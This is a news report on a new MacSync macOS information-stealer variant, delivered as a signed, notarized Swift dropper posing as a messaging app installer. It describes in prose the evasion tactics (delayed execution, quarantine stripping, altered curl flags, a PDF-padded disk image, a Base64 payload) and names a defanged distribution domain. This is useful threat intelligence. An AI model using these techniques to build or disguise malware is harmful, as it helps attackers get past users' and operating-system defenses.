Cybersecurity researchers have identified a new and more deceptive variant of a macOS information stealer known as MacSync, highlighting how threat actors continue to exploit trusted Apple mechanisms to distribute malware. The newly observed sample is delivered through a digitally signed and notarized Swift application that masquerades as a legitimate messaging app installer, allowing it to bypass Apple’s built in security checks such as Gatekeeper. The discovery was made by Jamf, an Apple device management and security company, which noted that this approach marks a shift from earlier MacSync campaigns that relied on more overt user interaction techniques.
According to Jamf researcher Thijs Xhaflaire, the latest MacSync variant abandons drag to terminal and ClickFix style social engineering in favor of a quieter and more automated infection chain. The malware is distributed within a disk image file named zk-call-messenger-installer-3.9.2-lts.dmg, hosted on the website zkcall[.]net/download. Because the application is code signed and notarized, macOS allows it to run without triggering warnings or being blocked by Gatekeeper or XProtect. Despite this, the installer still displays instructions encouraging users to right click and manually open the app, a tactic commonly associated with attempts to sidestep security protections. Apple has since revoked the abused code signing certificate after the activity was reported.
Once executed, the Swift based installer functions as a dropper and performs a series of environmental checks before retrieving the next stage payload. These checks include confirming active internet connectivity, enforcing a minimum execution delay of approximately one hour to limit repeated runs, and stripping quarantine attributes from downloaded components. The malware also validates files before execution, indicating an emphasis on stability and stealth. Researchers observed notable changes in how the payload is downloaded, including modifications to the curl command syntax. Instead of commonly used flags seen in previous variants, the malware splits options into separate parameters and introduces additional flags such as noproxy. Jamf noted that these adjustments, along with dynamically generated variables, suggest a deliberate attempt to evade detection or improve delivery reliability.
Another evasion tactic involves inflating the size of the disk image to more than 25 MB by embedding unrelated PDF documents. This unusual packaging may be intended to reduce suspicion or evade automated scanning tools that focus on smaller installer files. The downloaded payload itself is Base64 encoded and, once decoded, is confirmed to be MacSync, which is believed to be a rebranded evolution of the Mac.c malware first documented in April 2025. Research from MacPaw’s Moonlock Lab indicates that MacSync includes a Go based agent with extended capabilities beyond basic data theft. In addition to harvesting sensitive information, the malware supports remote command and control functions, enabling attackers to issue instructions and maintain long term access to compromised systems.
Security researchers note that this campaign reflects a broader trend within the macOS malware ecosystem. Threat actors are increasingly attempting to distribute malicious software through signed and notarized applications to make them appear legitimate and trustworthy to both users and operating system defenses. Similar tactics have been observed in previous campaigns involving fake Google Meet installers used to spread other macOS stealers such as Odyssey. At the same time, attackers continue to mix approaches, with unsigned disk images still being used in recent campaigns delivering malware like DigitStealer. Jamf cautioned that as long as attackers can obtain or abuse valid signing credentials, macOS users may continue to face threats that blend seamlessly into otherwise normal application workflows.
Follow the SPIN IDG WhatsApp Channel for updates across the Smart Pakistan Insights Network covering all of Pakistan’s technology ecosystem.
